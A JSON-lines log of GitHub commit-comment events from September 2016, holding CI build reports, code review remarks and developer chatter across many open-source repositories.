{"id":"4594613743","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19109491,"position":null,"line":null,"path":null,"commit_id":"a39cb8801b330a8be3e1d050842eb86c5d78d897","created_at":"2016-09-21T07:52:23Z","updated_at":"2016-09-21T07:52:23Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-21T07:52:23Z"}
{"id":"4594615498","type":"CommitCommentEvent","actor":{"login":"manics"},"repo":{"name":"manics/openmicroscopy"},"payload":{"comment":{"id":19109503,"position":null,"line":null,"path":null,"commit_id":"d66cc8b2cd4d5f282bb34ff620431ea1aae853d0","created_at":"2016-09-21T07:52:48Z","updated_at":"2016-09-21T07:52:48Z","body":"TODO: Try `%run -G` instead of `_quote()`:\r\n```\r\n-G\r\n  disable shell-like glob expansion of arguments.\r\n```"}},"created_at":"2016-09-21T07:52:48Z"}
{"id":"4594617599","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19109505,"position":null,"line":null,"path":null,"commit_id":"a39cb8801b330a8be3e1d050842eb86c5d78d897","created_at":"2016-09-21T07:53:19Z","updated_at":"2016-09-21T07:53:19Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T07:53:19Z"}
{"id":"4594620652","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109511,"position":60,"line":361,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T07:54:04Z","updated_at":"2016-09-21T07:54:04Z","body":"fixed"}},"created_at":"2016-09-21T07:54:04Z"}
{"id":"4594624453","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19109517,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-21T07:55:00Z","updated_at":"2016-09-21T07:55:00Z","body":"TeamCity test :: test [Build 20](http://ci.lemmew.com:8111/viewLog.html?buildId=1587&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-21T07:55:00Z"}
{"id":"4594624544","type":"CommitCommentEvent","actor":{"login":"oberstet"},"repo":{"name":"crossbario/autobahn-js"},"payload":{"comment":{"id":19109518,"position":42,"line":127,"path":"package/lib/session.js","commit_id":"65df30cbe293226ae5565e96a02e4387a918f6e6","created_at":"2016-09-21T07:55:01Z","updated_at":"2016-09-21T07:55:01Z","body":"// whenjs has the actual user promise in an attribute"}},"created_at":"2016-09-21T07:55:01Z"}
{"id":"4594624718","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19109520,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-21T07:55:04Z","updated_at":"2016-09-21T07:55:04Z","body":"TeamCity test :: test [Build 20](http://ci.lemmew.com:8111/viewLog.html?buildId=1587&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:04"}},"created_at":"2016-09-21T07:55:04Z"}
{"id":"4594626072","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109525,"position":81,"line":398,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T07:55:23Z","updated_at":"2016-09-21T07:55:23Z","body":"No, they mean post-raft filler layers.\r\n`processLayer` is not called during the generation of the raft layers."}},"created_at":"2016-09-21T07:55:23Z"}
{"id":"4594627971","type":"CommitCommentEvent","actor":{"login":"KosKam"},"repo":{"name":"KosKam/test4"},"payload":{"comment":{"id":19109527,"position":null,"line":null,"path":null,"commit_id":"42fe74c2c97f8e73c2a7cbce7c51e54c8aa3bf47","created_at":"2016-09-21T07:55:51Z","updated_at":"2016-09-21T07:55:51Z","body":"first commment"}},"created_at":"2016-09-21T07:55:51Z"}
{"id":"4594629761","type":"CommitCommentEvent","actor":{"login":"alankarmore"},"repo":{"name":"alankarmore/gabicus"},"payload":{"comment":{"id":19109533,"position":null,"line":null,"path":null,"commit_id":"a85e1579a62623d5b5239187e4ecaac06ba789eb","created_at":"2016-09-21T07:56:16Z","updated_at":"2016-09-21T07:56:16Z","body":"Good one.  FYI: \r\nBelow are some guidelines you have to follow from next time. \r\n- Always use braces for control structures. Even if it is a single if condition\r\n- Always add extra line after every } brace of control structures (if,for,while,switch..case etc)\r\n- Use  static values on left had side as $(this).val()=='employee' ---- 'employee' == $(this).val()\r\n- There should be space between operands and operators. \r\n- Do Not commit commented code."}},"created_at":"2016-09-21T07:56:16Z"}
{"id":"4594630425","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109536,"position":84,"line":401,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T07:56:25Z","updated_at":"2016-09-21T07:56:25Z","body":"Nope, only this one can be made constant."}},"created_at":"2016-09-21T07:56:25Z"}
{"id":"4594630583","type":"CommitCommentEvent","actor":{"login":"hholzgra"},"repo":{"name":"percona/percona-xtradb-cluster"},"payload":{"comment":{"id":19109537,"position":null,"line":null,"path":null,"commit_id":"47ce0237e452b19a225e59b67681746f4d94dfd2","created_at":"2016-09-21T07:56:27Z","updated_at":"2016-09-21T07:56:27Z","body":"CentOS 6 is also affected\r\n\r\nSee https://bugs.launchpad.net/percona-xtradb-cluster/+bug/1625968\r\n"}},"created_at":"2016-09-21T07:56:27Z"}
{"id":"4594631084","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109538,"position":84,"line":401,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T07:56:35Z","updated_at":"2016-09-21T07:56:35Z","body":"And I did that."}},"created_at":"2016-09-21T07:56:35Z"}
{"id":"4594631850","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19109539,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-21T07:56:47Z","updated_at":"2016-09-21T07:56:47Z","body":"TeamCity test :: test [Build 21](http://ci.lemmew.com:8111/viewLog.html?buildId=1588&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-21T07:56:47Z"}
{"id":"4594631967","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19109540,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-21T07:56:49Z","updated_at":"2016-09-21T07:56:49Z","body":"TeamCity test :: test [Build 21](http://ci.lemmew.com:8111/viewLog.html?buildId=1588&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:01"}},"created_at":"2016-09-21T07:56:49Z"}
{"id":"4594632670","type":"CommitCommentEvent","actor":{"login":"KosKam"},"repo":{"name":"KosKam/test4"},"payload":{"comment":{"id":19109544,"position":null,"line":null,"path":null,"commit_id":"6028c519ca095746c78b2dd27d2016085a446298","created_at":"2016-09-21T07:56:58Z","updated_at":"2016-09-21T07:56:58Z","body":"test 2"}},"created_at":"2016-09-21T07:56:58Z"}
{"id":"4594635736","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109558,"position":124,"line":461,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T07:57:41Z","updated_at":"2016-09-21T07:57:41Z","body":"Yes, the filler layers are duplicated from the initial layer to within the airgap.\r\nMeshes are only printed from layer 0 and onward."}},"created_at":"2016-09-21T07:57:41Z"}
{"id":"4594636805","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109561,"position":165,"line":496,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T07:57:56Z","updated_at":"2016-09-21T07:57:56Z","body":"On purpose, see my comment above"}},"created_at":"2016-09-21T07:57:56Z"}
{"id":"4594640130","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109571,"position":5,"line":114,"path":"src/sliceDataStorage.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T07:58:43Z","updated_at":"2016-09-21T07:58:43Z","body":"I don't think so."}},"created_at":"2016-09-21T07:58:43Z"}
{"id":"4594643506","type":"CommitCommentEvent","actor":{"login":"alankarmore"},"repo":{"name":"alankarmore/gabicus"},"payload":{"comment":{"id":19109577,"position":90,"line":32,"path":"app/controllers/Auth/AuthController.php","commit_id":"fdb8a227bf58302a4f9d95603c76b2ec425dda07","created_at":"2016-09-21T07:59:29Z","updated_at":"2016-09-21T07:59:29Z","body":"Can we put this code in service Instead of controller."}},"created_at":"2016-09-21T07:59:29Z"}
{"id":"4594644793","type":"CommitCommentEvent","actor":{"login":"pan780919"},"repo":{"name":"pan780919/Seven7"},"payload":{"comment":{"id":19109580,"position":null,"line":null,"path":null,"commit_id":"958d9cac0dfe500c64c56baa73f063854aa75057","created_at":"2016-09-21T07:59:47Z","updated_at":"2016-09-21T07:59:47Z","body":"1"}},"created_at":"2016-09-21T07:59:47Z"}
{"id":"4594649146","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109591,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:00:42Z","updated_at":"2016-09-21T08:00:42Z","body":"can't even use the data structures. Managed classes need System.Collections.Queue\r\nAlso packetManager and a proper abstractPacket will need to be made. :("}},"created_at":"2016-09-21T08:00:42Z"}
{"id":"4594654451","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19109603,"position":5,"line":114,"path":"src/sliceDataStorage.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-21T08:01:52Z","updated_at":"2016-09-21T08:01:52Z","body":"Nope. Verified using http://coliru.stacked-crooked.com/"}},"created_at":"2016-09-21T08:01:52Z"}
{"id":"4594660295","type":"CommitCommentEvent","actor":{"login":"jroweboy"},"repo":{"name":"Jhno591/Citra"},"payload":{"comment":{"id":19109613,"position":null,"line":null,"path":null,"commit_id":"a671a254559bff4aa71e9e38dd31134c5a62d778","created_at":"2016-09-21T08:03:16Z","updated_at":"2016-09-21T08:03:16Z","body":"@Jhno591 i don't know what you mean."}},"created_at":"2016-09-21T08:03:16Z"}
{"id":"4594662489","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-contacts"},"payload":{"comment":{"id":19109619,"position":5,"line":256,"path":"tests/tests.js","commit_id":"723a2d0f99ed6a6c1985a1500292396ffd683773","created_at":"2016-09-21T08:03:32Z","updated_at":"2016-09-21T08:03:32Z","body":"'should features displayName from desiredFields' -> 'should contain displayName if specified in desiredFields'"}},"created_at":"2016-09-21T08:03:32Z"}
{"id":"4594663088","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19109620,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-21T08:03:39Z","updated_at":"2016-09-21T08:03:39Z","body":"fixBranchTransition (mitchute) - Win64-Windows-7-VisualStudio-12: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T08:03:39Z"}
{"id":"4594663389","type":"CommitCommentEvent","actor":{"login":"evilive3000"},"repo":{"name":"crossbario/autobahn-js"},"payload":{"comment":{"id":19109621,"position":42,"line":127,"path":"package/lib/session.js","commit_id":"65df30cbe293226ae5565e96a02e4387a918f6e6","created_at":"2016-09-21T08:03:43Z","updated_at":"2016-09-21T08:03:43Z","body":"oops, missed leading underscore in variable name, sorry."}},"created_at":"2016-09-21T08:03:43Z"}
{"id":"4594667325","type":"CommitCommentEvent","actor":{"login":"philwareham"},"repo":{"name":"textpattern/textpacks"},"payload":{"comment":{"id":19109627,"position":null,"line":null,"path":null,"commit_id":"c0c124f0ed8a6c393188eaac641cc20932b3ebc1","created_at":"2016-09-21T08:04:40Z","updated_at":"2016-09-21T08:04:40Z","body":"Thanks the the info Ruud, reverting this one"}},"created_at":"2016-09-21T08:04:40Z"}
{"id":"4594669240","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109632,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:05:08Z","updated_at":"2016-09-21T08:05:08Z","body":"That is why i need to wrap the CommNode stuff. Screw the Systems.Collections crap. We are CS students, we can make our own. I am wrapping everything we will need. Once we finish this, we are going write the Comms node in C#."}},"created_at":"2016-09-21T08:05:08Z"}
{"id":"4594672898","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109640,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:06:00Z","updated_at":"2016-09-21T08:06:00Z","body":"ABSPacket works fine, so those everything else we wrapped. We can't wrap native Comms, so we are going to have to rewrite another one in C++CLI mode."}},"created_at":"2016-09-21T08:06:00Z"}
{"id":"4594673297","type":"CommitCommentEvent","actor":{"login":"redpik"},"repo":{"name":"PrestaShop/community-theme-16"},"payload":{"comment":{"id":19109641,"position":null,"line":null,"path":null,"commit_id":"882f77104dcc8b2c4df000f5678d27ed6077ba42","created_at":"2016-09-21T08:06:06Z","updated_at":"2016-09-21T08:06:06Z","body":"Thanx :)\r\nI will try to contribute more!"}},"created_at":"2016-09-21T08:06:06Z"}
{"id":"4594673718","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19109648,"position":null,"line":null,"path":null,"commit_id":"435736e3d2e29402fc48e22e4f16700fb1da5e24","created_at":"2016-09-21T08:06:12Z","updated_at":"2016-09-21T08:06:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1077](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13692&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T08:06:12Z"}
{"id":"4594674553","type":"CommitCommentEvent","actor":{"login":"rocgao"},"repo":{"name":"rocgao/roc-unitofworkcore-ef"},"payload":{"comment":{"id":19109651,"position":null,"line":null,"path":null,"commit_id":"a01c8ccbe8e409a80d63950a83fe9f82fa07440f","created_at":"2016-09-21T08:06:24Z","updated_at":"2016-09-21T08:06:24Z","body":"修改包依赖关系，只依赖于Microsoft.EntityFrameworkCore"}},"created_at":"2016-09-21T08:06:24Z"}
{"id":"4594675208","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109653,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:06:34Z","updated_at":"2016-09-21T08:06:34Z","body":"Actually no, fuck that\r\nWe are going to wrap everything we need. THEN we are going to build it."}},"created_at":"2016-09-21T08:06:34Z"}
{"id":"4594676622","type":"CommitCommentEvent","actor":{"login":"silvanheller"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19109657,"position":null,"line":null,"path":null,"commit_id":"2646799b78b9a700e201b5a6b82b94210f4d7335","created_at":"2016-09-21T08:06:54Z","updated_at":"2016-09-21T08:06:54Z","body":"Closes #42 "}},"created_at":"2016-09-21T08:06:54Z"}
{"id":"4594677738","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109660,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:07:08Z","updated_at":"2016-09-21T08:07:08Z","body":"When we build it, we will use the dll in a C# dll source where we will build the new Comms in."}},"created_at":"2016-09-21T08:07:08Z"}
{"id":"4594680221","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19109666,"position":null,"line":null,"path":null,"commit_id":"81614e20b73521a4e01f4833953b59ef088fb455","created_at":"2016-09-21T08:07:43Z","updated_at":"2016-09-21T08:07:43Z","body":"In that case I hope it will fail... :-)"}},"created_at":"2016-09-21T08:07:43Z"}
{"id":"4594683883","type":"CommitCommentEvent","actor":{"login":"zhjx922"},"repo":{"name":"zhjx922/myblog"},"payload":{"comment":{"id":19109683,"position":null,"line":null,"path":null,"commit_id":"eee2cf2c453a7f5bd6544aac4159a27aa5cd458c","created_at":"2016-09-21T08:08:34Z","updated_at":"2016-09-21T08:08:34Z","body":"test"}},"created_at":"2016-09-21T08:08:34Z"}
{"id":"4594684243","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109686,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:08:38Z","updated_at":"2016-09-21T08:08:38Z","body":"So Like this, CommProto(C++) -> CPCSharpWrapper (C++CLI APIs) -> CommProto (New Comms APIs)\r\n\r\nCommProto (C#) will be the library that will be used by UGV."}},"created_at":"2016-09-21T08:08:38Z"}
{"id":"4594685001","type":"CommitCommentEvent","actor":{"login":"ctron"},"repo":{"name":"malikm/kura_windows_2"},"payload":{"comment":{"id":19109691,"position":null,"line":null,"path":null,"commit_id":"73e8e8ab81f17c415fafd28f6161521d0bb4afb6","created_at":"2016-09-21T08:08:49Z","updated_at":"2016-09-21T08:08:49Z","body":"I still see the \"EXE\" files as additions. Is this correct?\r\n\r\nI would also change the name of the function altogether. Just since you are mixing styles `str_replace` vs `PrepareCommandLine`."}},"created_at":"2016-09-21T08:08:49Z"}
{"id":"4594685522","type":"CommitCommentEvent","actor":{"login":"ayalaallon"},"repo":{"name":"ayalaallon/prepdat"},"payload":{"comment":{"id":19109692,"position":null,"line":null,"path":null,"commit_id":"da5d2eeaa5a93b55371bc322cca35c5beac0184e","created_at":"2016-09-21T08:08:57Z","updated_at":"2016-09-21T08:08:57Z","body":"Add unit test"}},"created_at":"2016-09-21T08:08:57Z"}
{"id":"4594685980","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109693,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:09:03Z","updated_at":"2016-09-21T08:09:03Z","body":"I'm tired of stupidly wrapping Comms in C++CLI mode, it's ridulous and not meant to work like that."}},"created_at":"2016-09-21T08:09:03Z"}
{"id":"4594686498","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19109694,"position":null,"line":null,"path":null,"commit_id":"3b0616ca6b81591c5414bfeda7c43d3adc92ed5d","created_at":"2016-09-21T08:09:10Z","updated_at":"2016-09-21T08:09:10Z","body":"Hi Paul 😄 \r\nhope you're doing well"}},"created_at":"2016-09-21T08:09:10Z"}
{"id":"4594688473","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109697,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:09:37Z","updated_at":"2016-09-21T08:09:37Z","body":"We have to break down the problem into smaller chunks."}},"created_at":"2016-09-21T08:09:37Z"}
{"id":"4594690211","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-contacts"},"payload":{"comment":{"id":19109700,"position":null,"line":null,"path":null,"commit_id":"723a2d0f99ed6a6c1985a1500292396ffd683773","created_at":"2016-09-21T08:10:02Z","updated_at":"2016-09-21T08:10:02Z","body":"Pls. rename commit (i don't like the word 'feature' which sounds odd in this context, retrieve or populate is more natural, the last one is especially as it is being used in the code). Smth. like this:\r\n\r\n\"CB-11350 android: retrieve displayName for contact when specified in desiredFields\r\ndisplayName wasn't being retrieved because of wrong condition in populateContactArray\"\r\n\r\nHint: try to use markdown when writing comment messages - it will be rendered on GitHub when submitting a PR. This is not mandatory but would make your PRs look a bit better ;)"}},"created_at":"2016-09-21T08:10:02Z"}
{"id":"4594696634","type":"CommitCommentEvent","actor":{"login":"KosKam"},"repo":{"name":"KosKam/test5"},"payload":{"comment":{"id":19109711,"position":null,"line":null,"path":null,"commit_id":"1e84098bd40d4a1ecfaddfc175a71c46cc735045","created_at":"2016-09-21T08:11:29Z","updated_at":"2016-09-21T08:11:29Z","body":"new comment 5\r\n"}},"created_at":"2016-09-21T08:11:29Z"}
{"id":"4594697240","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109714,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:11:38Z","updated_at":"2016-09-21T08:11:38Z","body":"I am an idiot. I should have made an interface for CommNode too."}},"created_at":"2016-09-21T08:11:38Z"}
{"id":"4594697485","type":"CommitCommentEvent","actor":{"login":"vtexier"},"repo":{"name":"duniter/sakia"},"payload":{"comment":{"id":19109717,"position":82,"line":82,"path":"src/sakia/data/repositories/communities.py","commit_id":"433b9970862f536d7282f6c9ef9ef92a23db5000","created_at":"2016-09-21T08:11:41Z","updated_at":"2016-09-21T08:11:41Z","body":"Yes, rethinking about it, it's silly to do that only on one attribute.\r\nWe can start with a simple \"equals\" filter on attributes, and may be develop later a more powerful filter where we can define the comparison operators, to define range for dates, etc...\r\nI will remove it."}},"created_at":"2016-09-21T08:11:41Z"}
{"id":"4594697755","type":"CommitCommentEvent","actor":{"login":"luk3k0"},"repo":{"name":"luk3k0/gnome-shell-system-monitor-applet"},"payload":{"comment":{"id":19109718,"position":3,"line":2,"path":"system-monitor@paradoxxx.zero.gmail.com/metadata.json","commit_id":"7ab62f47a024245b7ff55ad50b34ac9da5a76e6e","created_at":"2016-09-21T08:11:45Z","updated_at":"2016-09-21T08:11:45Z","body":"add for gnome 3.21"}},"created_at":"2016-09-21T08:11:45Z"}
{"id":"4594697864","type":"CommitCommentEvent","actor":{"login":"franklinkim"},"repo":{"name":"weareinteractive/ansible-ufw"},"payload":{"comment":{"id":19109719,"position":null,"line":null,"path":null,"commit_id":"a856fc3d2327764995cad8d428744e4f66f63da2","created_at":"2016-09-21T08:11:46Z","updated_at":"2016-09-21T08:11:46Z","body":"It will `allow` by default but we can set it explicitly to make it more clear, yes"}},"created_at":"2016-09-21T08:11:46Z"}
{"id":"4594698059","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109721,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:11:50Z","updated_at":"2016-09-21T08:11:50Z","body":"Thought abs is trying to wrap abstract packet?"}},"created_at":"2016-09-21T08:11:50Z"}
{"id":"4594702360","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19109730,"position":null,"line":null,"path":null,"commit_id":"2e3cb312b0b71ba695c1d1a6dfd12732a43b5942","created_at":"2016-09-21T08:12:49Z","updated_at":"2016-09-21T08:12:49Z","body":"Isn't com nodes an interface"}},"created_at":"2016-09-21T08:12:49Z"}
{"id":"4594704765","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19109734,"position":null,"line":null,"path":null,"commit_id":"65903bcca29c753ba260c99ce76909bba49fefb0","created_at":"2016-09-21T08:13:23Z","updated_at":"2016-09-21T08:13:23Z","body":"Before this change when you modified genlua it would recompile typer and all its dependencies. Now you just go straight genlua -> main -> done."}},"created_at":"2016-09-21T08:13:23Z"}
{"id":"4594705105","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19109736,"position":null,"line":null,"path":null,"commit_id":"72a4aad28dce9fc7b0f840329b3f8a77e685f372","created_at":"2016-09-21T08:13:27Z","updated_at":"2016-09-21T08:13:27Z","body":"上記ご提示頂きました内容の2件に分けてコミットします。"}},"created_at":"2016-09-21T08:13:27Z"}
{"id":"4594706979","type":"CommitCommentEvent","actor":{"login":"malikm"},"repo":{"name":"malikm/kura_windows_2"},"payload":{"comment":{"id":19109740,"position":null,"line":null,"path":null,"commit_id":"73e8e8ab81f17c415fafd28f6161521d0bb4afb6","created_at":"2016-09-21T08:13:53Z","updated_at":"2016-09-21T08:13:53Z","body":"Those EXE files were recompiled with the new replaced function.\r\nWe can remove all EXE/DLL files from repo once we have a clear list of what's approved and what's not."}},"created_at":"2016-09-21T08:13:53Z"}
{"id":"4594708885","type":"CommitCommentEvent","actor":{"login":"caspChristian"},"repo":{"name":"bitcoinclassic/bitcoinclassic"},"payload":{"comment":{"id":19109743,"position":null,"line":null,"path":null,"commit_id":"1f18a92c1c5fee5441dd8060022d7ecb80d2c58d","created_at":"2016-09-21T08:14:19Z","updated_at":"2016-09-21T08:14:19Z","body":"What is the reason for this being reverted? (would like to see a bit more of a explanation in the commit messages)"}},"created_at":"2016-09-21T08:14:19Z"}
{"id":"4594708902","type":"CommitCommentEvent","actor":{"login":"taimir"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19109744,"position":null,"line":null,"path":null,"commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-21T08:14:19Z","updated_at":"2016-09-21T08:14:19Z","body":"Oh sure, I'll try it out some time today and report back :)"}},"created_at":"2016-09-21T08:14:19Z"}
{"id":"4594709626","type":"CommitCommentEvent","actor":{"login":"sandy081"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19109747,"position":null,"line":null,"path":null,"commit_id":"2612a7157151df83de855c7086992b8997764009","created_at":"2016-09-21T08:14:29Z","updated_at":"2016-09-21T08:14:29Z","body":"fixes #11976 "}},"created_at":"2016-09-21T08:14:29Z"}
{"id":"4594710399","type":"CommitCommentEvent","actor":{"login":"sandy081"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19109749,"position":null,"line":null,"path":null,"commit_id":"2f76c44632b0d47ba97f66fbc158c763628e30b3","created_at":"2016-09-21T08:14:41Z","updated_at":"2016-09-21T08:14:41Z","body":"fixes #11976 "}},"created_at":"2016-09-21T08:14:41Z"}
